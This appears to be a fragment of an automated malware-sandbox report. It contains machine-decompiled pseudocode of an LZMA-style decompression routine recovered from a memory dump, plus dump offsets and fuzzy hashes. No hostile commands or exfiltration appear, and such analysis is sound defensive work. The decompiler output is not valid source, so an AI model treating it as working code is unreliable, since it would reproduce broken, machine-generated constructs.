              															__eax = __eax - __ecx;
              															__edi = __edi + 1;
              															__eflags = __edi;
              															 *(__ebp - 0x44) = __ebx;
              															 *__esi = __ax;
              															 *(__ebp - 0x50) = __edi;
              														} else {
              															 *(__ebp - 0x10) = __edx;
              															0x800 = 0x800 - __ecx;
              															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              															 *__esi = __dx;
              														}
              														__eflags =  *(__ebp - 0x10) - 0x1000000;
              														if( *(__ebp - 0x10) >= 0x1000000) {
              															L111:
              															_t368 = __ebp - 0x48;
              															 *_t368 =  *(__ebp - 0x48) + 1;
              															__eflags =  *_t368;
              															goto L112;
              														} else {
              															goto L109;
              														}
              													}
              													__ecx =  *(__ebp - 0xc);
              													__ebx = __ebx + __ebx;
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
              													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              													 *(__ebp - 0x44) = __ebx;
              													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
              														__ecx =  *(__ebp - 0x10);
              														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              														__ebx = __ebx | 0x00000001;
              														__eflags = __ebx;
              														 *(__ebp - 0x44) = __ebx;
              													}
              													__eflags =  *(__ebp - 0x10) - 0x1000000;
              													if( *(__ebp - 0x10) >= 0x1000000) {
              														L101:
              														_t338 = __ebp - 0x48;
              														 *_t338 =  *(__ebp - 0x48) - 1;
              														__eflags =  *_t338;
              														goto L102;
              													} else {
              														goto L99;
              													}
              												}
              												__edx =  *(__ebp - 4);
              												__eax = __eax - __ebx;
              												 *(__ebp - 0x40) = __ecx;
              												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
              												goto L108;
              											case 0x1a:
              												L56:
              												__eflags =  *(__ebp - 0x64);
              												if( *(__ebp - 0x64) == 0) {
              													 *(__ebp - 0x88) = 0x1a;
              													goto L170;
              												}
              												__ecx =  *(__ebp - 0x68);
              												__al =  *(__ebp - 0x5c);
              												__edx =  *(__ebp - 8);
              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              												 *( *(__ebp - 0x68)) = __al;
              												__ecx =  *(__ebp - 0x14);
              												 *(__ecx +  *(__ebp - 8)) = __al;
              												__eax = __ecx + 1;
              												__edx = 0;
              												_t192 = __eax %  *(__ebp - 0x74);
              												__eax = __eax /  *(__ebp - 0x74);
              												__edx = _t192;
              												goto L80;
              											case 0x1b:
              												L76:
              												__eflags =  *(__ebp - 0x64);
              												if( *(__ebp - 0x64) == 0) {
              													 *(__ebp - 0x88) = 0x1b;
              													goto L170;
              												}
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__edx =  *(__ebp - 8);
              												__cl =  *(__eax + __edx);
              												__eax =  *(__ebp - 0x14);
              												 *(__ebp - 0x5c) = __cl;
              												 *(__eax + __edx) = __cl;
              												__eax = __eax + 1;
              												__edx = 0;
              												_t275 = __eax %  *(__ebp - 0x74);
              												__eax = __eax /  *(__ebp - 0x74);
              												__edx = _t275;
              												__eax =  *(__ebp - 0x68);
              												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              												_t284 = __ebp - 0x64;
              												 *_t284 =  *(__ebp - 0x64) - 1;
              												__eflags =  *_t284;
              												 *( *(__ebp - 0x68)) = __cl;
              												L80:
              												 *(__ebp - 0x14) = __edx;
              												goto L81;
              											case 0x1c:
              												while(1) {
              													L123:
              													__eflags =  *(__ebp - 0x64);
              													if( *(__ebp - 0x64) == 0) {
              														break;
              													}
              													__eax =  *(__ebp - 0x14);
              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              													__eflags = __eax -  *(__ebp - 0x74);
              													if(__eax >=  *(__ebp - 0x74)) {
              														__eax = __eax +  *(__ebp - 0x74);
              														__eflags = __eax;
              													}
              													__edx =  *(__ebp - 8);
              													__cl =  *(__eax + __edx);
              													__eax =  *(__ebp - 0x14);
              													 *(__ebp - 0x5c) = __cl;
              													 *(__eax + __edx) = __cl;
              													__eax = __eax + 1;
              													__edx = 0;
              													_t414 = __eax %  *(__ebp - 0x74);
              													__eax = __eax /  *(__ebp - 0x74);
              													__edx = _t414;
              													__eax =  *(__ebp - 0x68);
              													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
              													__eflags =  *(__ebp - 0x30);
              													 *( *(__ebp - 0x68)) = __cl;
              													 *(__ebp - 0x14) = _t414;
              													if( *(__ebp - 0x30) > 0) {
              														continue;
              													} else {
              														L81:
              														 *(__ebp - 0x88) = 2;
              														goto L1;
              													}
              												}
              												 *(__ebp - 0x88) = 0x1c;
              												goto L170;
              										}
              									}
              									L171:
              									_t535 = _t534 | 0xffffffff;
              									goto L172;
              								}
              							}
              						}
              					}
              					goto L1;
              				}
              			}














              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
              • Instruction ID: ba5f555e51aa8b1381cdd2b0d2a1af6e0fef70f9c7cb40d8a5f6f768353cc961
              • Opcode Fuzzy Hash: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
              • Instruction Fuzzy Hash: 30713371E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786986DF45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00406F64() {
              				unsigned short _t531;
              				signed int _t532;
              				void _t533;
              				signed int _t534;
              				signed int _t535;
              				signed int _t565;
              				signed int _t568;
              				signed int _t589;
              				signed int* _t606;
              				void* _t613;
              
              				L0:
              				while(1) {
              					L0:
              					if( *(_t613 - 0x40) != 0) {
              						 *(_t613 - 0x84) = 0xa;
              						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
              					} else {
              						 *(__ebp - 0x84) = 9;
              						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
              					}
              					while(1) {
              						 *(_t613 - 0x54) = _t606;
              						while(1) {
              							L133:
              							_t531 =  *_t606;
              							_t589 = _t531 & 0x0000ffff;
              							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
              							if( *(_t613 - 0xc) >= _t565) {
              								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
              								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
              								 *(_t613 - 0x40) = 1;
              								_t532 = _t531 - (_t531 >> 5);
              								 *_t606 = _t532;
              							} else {
              								 *(_t613 - 0x10) = _t565;
              								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              								 *_t606 = (0x800 - _t589 >> 5) + _t531;
              							}
              							if( *(_t613 - 0x10) >= 0x1000000) {
              								goto L139;
              							}
              							L137:
              							if( *(_t613 - 0x6c) == 0) {
              								 *(_t613 - 0x88) = 5;
              								L170:
              								_t568 = 0x22;
              								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
              								_t535 = 0;
              								L172:
              								return _t535;
              							}
              							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
              							L139:
              							_t533 =  *(_t613 - 0x84);
              							while(1) {
              								 *(_t613 - 0x88) = _t533;
              								while(1) {
              									L1:
              									_t534 =  *(_t613 - 0x88);
              									if(_t534 > 0x1c) {
              										break;
              									}
              									switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
              										case 0:
              											if( *(_t613 - 0x6c) == 0) {
              												goto L170;
              											}
              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              											_t534 =  *( *(_t613 - 0x70));
              											if(_t534 > 0xe1) {
              												goto L171;
              											}
              											_t538 = _t534 & 0x000000ff;
              											_push(0x2d);
              											asm("cdq");
              											_pop(_t570);
              											_push(9);
              											_pop(_t571);
              											_t609 = _t538 / _t570;
              											_t540 = _t538 % _t570 & 0x000000ff;
              											asm("cdq");
              											_t604 = _t540 % _t571 & 0x000000ff;
              											 *(_t613 - 0x3c) = _t604;
              											 *(_t613 - 0x1c) = (1 << _t609) - 1;
              											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
              											_t612 = (0x300 << _t604 + _t609) + 0x736;
              											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
              												L10:
              												if(_t612 == 0) {
              													L12:
              													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
              													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              													goto L15;
              												} else {
              													goto L11;
              												}
              												do {
              													L11:
              													_t612 = _t612 - 1;
              													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
              												} while (_t612 != 0);
              												goto L12;
              											}
              											if( *(_t613 - 4) != 0) {
              												GlobalFree( *(_t613 - 4));
              											}
              											_t534 = GlobalAlloc(0x40, 0x600); // executed
              											 *(_t613 - 4) = _t534;
              											if(_t534 == 0) {
              												goto L171;
              											} else {
              												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
              												goto L10;
              											}
              										case 1:
              											L13:
              											__eflags =  *(_t613 - 0x6c);
              											if( *(_t613 - 0x6c) == 0) {
              												 *(_t613 - 0x88) = 1;
              												goto L170;
              											}
              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
              											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              											_t45 = _t613 - 0x48;
              											 *_t45 =  *(_t613 - 0x48) + 1;
              											__eflags =  *_t45;
              											L15:
              											if( *(_t613 - 0x48) < 4) {
              												goto L13;
              											}
              											_t546 =  *(_t613 - 0x40);
              											if(_t546 ==  *(_t613 - 0x74)) {
              												L20:
              												 *(_t613 - 0x48) = 5;
              												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
              												goto L23;
              											}
              											 *(_t613 - 0x74) = _t546;
              											if( *(_t613 - 8) != 0) {
              												GlobalFree( *(_t613 - 8));
              											}
              											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
              											 *(_t613 - 8) = _t534;
              											if(_t534 == 0) {
              												goto L171;
              											} else {
              												goto L20;
              											}
              										case 2:
              											L24:
              											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
              											 *(_t613 - 0x84) = 6;
              											 *(_t613 - 0x4c) = _t553;
              											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
              											 *(_t613 - 0x54) = _t606;
              											goto L133;
              										case 3:
              											L21:
              											__eflags =  *(_t613 - 0x6c);
              											if( *(_t613 - 0x6c) == 0) {
              												 *(_t613 - 0x88) = 3;
              												goto L170;
              											}
              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              											_t67 = _t613 - 0x70;
              											 *_t67 =  &(( *(_t613 - 0x70))[1]);
              											__eflags =  *_t67;
              											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
              											L23:
              											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
              											if( *(_t613 - 0x48) != 0) {
              												goto L21;
              											}
              											goto L24;
              										case 4:
              											L133:
              											_t531 =  *_t606;
              											_t589 = _t531 & 0x0000ffff;
              											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
              											if( *(_t613 - 0xc) >= _t565) {
              												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
              												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
              												 *(_t613 - 0x40) = 1;
              												_t532 = _t531 - (_t531 >> 5);
              												 *_t606 = _t532;
              											} else {
              												 *(_t613 - 0x10) = _t565;
              												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              												 *_t606 = (0x800 - _t589 >> 5) + _t531;
              											}
              											if( *(_t613 - 0x10) >= 0x1000000) {
              												goto L139;
              											}
              										case 5:
              											goto L137;
              										case 6:
              											__edx = 0;
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x34) = 1;
              												 *(__ebp - 0x84) = 7;
              												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
              												while(1) {
              													 *(_t613 - 0x54) = _t606;
              													goto L133;
              												}
              											}
              											__eax =  *(__ebp - 0x5c) & 0x000000ff;
              											__esi =  *(__ebp - 0x60);
              											__cl = 8;
              											__cl = 8 -  *(__ebp - 0x3c);
              											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
              											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
              											__ecx =  *(__ebp - 0x3c);
              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
              											__ecx =  *(__ebp - 4);
              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
              											__eflags =  *(__ebp - 0x38) - 4;
              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              											if( *(__ebp - 0x38) >= 4) {
              												__eflags =  *(__ebp - 0x38) - 0xa;
              												if( *(__ebp - 0x38) >= 0xa) {
              													_t98 = __ebp - 0x38;
              													 *_t98 =  *(__ebp - 0x38) - 6;
              													__eflags =  *_t98;
              												} else {
              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
              												}
              											} else {
              												 *(__ebp - 0x38) = 0;
              											}
              											__eflags =  *(__ebp - 0x34) - __edx;
              											if( *(__ebp - 0x34) == __edx) {
              												__ebx = 0;
              												__ebx = 1;
              												goto L61;
              											} else {
              												__eax =  *(__ebp - 0x14);
              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              												__eflags = __eax -  *(__ebp - 0x74);
              												if(__eax >=  *(__ebp - 0x74)) {
              													__eax = __eax +  *(__ebp - 0x74);
              													__eflags = __eax;
              												}
              												__ecx =  *(__ebp - 8);
              												__ebx = 0;
              												__ebx = 1;
              												__al =  *((intOrPtr*)(__eax + __ecx));
              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
              												goto L41;
              											}
              										case 7:
              											__eflags =  *(__ebp - 0x40) - 1;
              											if( *(__ebp - 0x40) != 1) {
              												__eax =  *(__ebp - 0x24);
              												 *(__ebp - 0x80) = 0x16;
              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
              												__eax =  *(__ebp - 0x28);
              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
              												__eax =  *(__ebp - 0x2c);
              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              												__eax = 0;
              												__eflags =  *(__ebp - 0x38) - 7;
              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              												__al = __al & 0x000000fd;
              												__eax = (__eflags >= 0) - 1 + 0xa;
              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
              												__eax =  *(__ebp - 4);
              												__eax =  *(__ebp - 4) + 0x664;
              												__eflags = __eax;
              												 *(__ebp - 0x58) = __eax;
              												goto L69;
              											}
              											__eax =  *(__ebp - 4);
              											__ecx =  *(__ebp - 0x38);
              											 *(__ebp - 0x84) = 8;
              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
              											while(1) {
              												 *(_t613 - 0x54) = _t606;
              												goto L133;
              											}
              										case 8:
              											goto L0;
              										case 9:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												goto L89;
              											}
              											__eflags =  *(__ebp - 0x60);
              											if( *(__ebp - 0x60) == 0) {
              												goto L171;
              											}
              											__eax = 0;
              											__eflags =  *(__ebp - 0x38) - 7;
              											_t258 =  *(__ebp - 0x38) - 7 >= 0;
              											__eflags = _t258;
              											0 | _t258 = _t258 + _t258 + 9;
              											 *(__ebp - 0x38) = _t258 + _t258 + 9;
              											goto L75;
              										case 0xa:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__eax =  *(__ebp - 4);
              												__ecx =  *(__ebp - 0x38);
              												 *(__ebp - 0x84) = 0xb;
              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
              												while(1) {
              													 *(_t613 - 0x54) = _t606;
              													goto L133;
              												}
              											}
              											__eax =  *(__ebp - 0x28);
              											goto L88;
              										case 0xb:
              											__eflags =  *(__ebp - 0x40);
              											if( *(__ebp - 0x40) != 0) {
              												__ecx =  *(__ebp - 0x24);
              												__eax =  *(__ebp - 0x20);
              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
              											} else {
              												__eax =  *(__ebp - 0x24);
              											}
              											__ecx =  *(__ebp - 0x28);
              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
              											L88:
              											__ecx =  *(__ebp - 0x2c);
              											 *(__ebp - 0x2c) = __eax;
              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              											L89:
              											__eax =  *(__ebp - 4);
              											 *(__ebp - 0x80) = 0x15;
              											__eax =  *(__ebp - 4) + 0xa68;
              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
              											goto L69;
              										case 0xc:
              											L99:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xc;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t334 = __ebp - 0x70;
              											 *_t334 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t334;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											__eax =  *(__ebp - 0x2c);
              											goto L101;
              										case 0xd:
              											L37:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xd;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t122 = __ebp - 0x70;
              											 *_t122 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t122;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L39:
              											__eax =  *(__ebp - 0x40);
              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
              												goto L48;
              											}
              											__eflags = __ebx - 0x100;
              											if(__ebx >= 0x100) {
              												goto L54;
              											}
              											L41:
              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
              											__ecx =  *(__ebp - 0x58);
              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
              											 *(__ebp - 0x48) = __eax;
              											__eax = __eax + 1;
              											__eax = __eax << 8;
              											__eax = __eax + __ebx;
              											__esi =  *(__ebp - 0x58) + __eax * 2;
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              											__ax =  *__esi;
              											 *(__ebp - 0x54) = __esi;
              											__edx = __ax & 0x0000ffff;
              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
              											__eflags =  *(__ebp - 0xc) - __ecx;
              											if( *(__ebp - 0xc) >= __ecx) {
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              												__cx = __ax;
              												 *(__ebp - 0x40) = 1;
              												__cx = __ax >> 5;
              												__eflags = __eax;
              												__ebx = __ebx + __ebx + 1;
              												 *__esi = __ax;
              											} else {
              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
              												 *(__ebp - 0x10) = __ecx;
              												0x800 = 0x800 - __edx;
              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              												__ebx = __ebx + __ebx;
              												 *__esi = __cx;
              											}
              											__eflags =  *(__ebp - 0x10) - 0x1000000;
              											 *(__ebp - 0x44) = __ebx;
              											if( *(__ebp - 0x10) >= 0x1000000) {
              												goto L39;
              											} else {
              												goto L37;
              											}
              										case 0xe:
              											L46:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xe;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t156 = __ebp - 0x70;
              											 *_t156 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t156;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											while(1) {
              												L48:
              												__eflags = __ebx - 0x100;
              												if(__ebx >= 0x100) {
              													break;
              												}
              												__eax =  *(__ebp - 0x58);
              												__edx = __ebx + __ebx;
              												__ecx =  *(__ebp - 0x10);
              												__esi = __edx + __eax;
              												__ecx =  *(__ebp - 0x10) >> 0xb;
              												__ax =  *__esi;
              												 *(__ebp - 0x54) = __esi;
              												__edi = __ax & 0x0000ffff;
              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              												__eflags =  *(__ebp - 0xc) - __ecx;
              												if( *(__ebp - 0xc) >= __ecx) {
              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              													__cx = __ax;
              													_t170 = __edx + 1; // 0x1
              													__ebx = _t170;
              													__cx = __ax >> 5;
              													__eflags = __eax;
              													 *__esi = __ax;
              												} else {
              													 *(__ebp - 0x10) = __ecx;
              													0x800 = 0x800 - __edi;
              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              													__ebx = __ebx + __ebx;
              													 *__esi = __cx;
              												}
              												__eflags =  *(__ebp - 0x10) - 0x1000000;
              												 *(__ebp - 0x44) = __ebx;
              												if( *(__ebp - 0x10) >= 0x1000000) {
              													continue;
              												} else {
              													goto L46;
              												}
              											}
              											L54:
              											_t173 = __ebp - 0x34;
              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
              											__eflags =  *_t173;
              											goto L55;
              										case 0xf:
              											L58:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0xf;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t203 = __ebp - 0x70;
              											 *_t203 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t203;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											L60:
              											__eflags = __ebx - 0x100;
              											if(__ebx >= 0x100) {
              												L55:
              												__al =  *(__ebp - 0x44);
              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
              												goto L56;
              											}
              											L61:
              											__eax =  *(__ebp - 0x58);
              											__edx = __ebx + __ebx;
              											__ecx =  *(__ebp - 0x10);
              											__esi = __edx + __eax;
              											__ecx =  *(__ebp - 0x10) >> 0xb;
              											__ax =  *__esi;
              											 *(__ebp - 0x54) = __esi;
              											__edi = __ax & 0x0000ffff;
              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              											__eflags =  *(__ebp - 0xc) - __ecx;
              											if( *(__ebp - 0xc) >= __ecx) {
              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              												__cx = __ax;
              												_t217 = __edx + 1; // 0x1
              												__ebx = _t217;
              												__cx = __ax >> 5;
              												__eflags = __eax;
              												 *__esi = __ax;
              											} else {
              												 *(__ebp - 0x10) = __ecx;
              												0x800 = 0x800 - __edi;
              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              												__ebx = __ebx + __ebx;
              												 *__esi = __cx;
              											}
              											__eflags =  *(__ebp - 0x10) - 0x1000000;
              											 *(__ebp - 0x44) = __ebx;
              											if( *(__ebp - 0x10) >= 0x1000000) {
              												goto L60;
              											} else {
              												goto L58;
              											}
              										case 0x10:
              											L109:
              											__eflags =  *(__ebp - 0x6c);
              											if( *(__ebp - 0x6c) == 0) {
              												 *(__ebp - 0x88) = 0x10;
              												goto L170;
              											}
              											__ecx =  *(__ebp - 0x70);
              											__eax =  *(__ebp - 0xc);
              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											_t365 = __ebp - 0x70;
              											 *_t365 =  *(__ebp - 0x70) + 1;
              											__eflags =  *_t365;
              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              											goto L111;
              										case 0x11:
              											L69:
              											__esi =  *(__ebp - 0x58);
              											 *(__ebp - 0x84) = 0x12;
              											while(1) {
              												 *(_t613 - 0x54) = _t606;
              												goto L133;
              											}
              										case 0x12:
              											__eflags =  *(__ebp - 0x40);
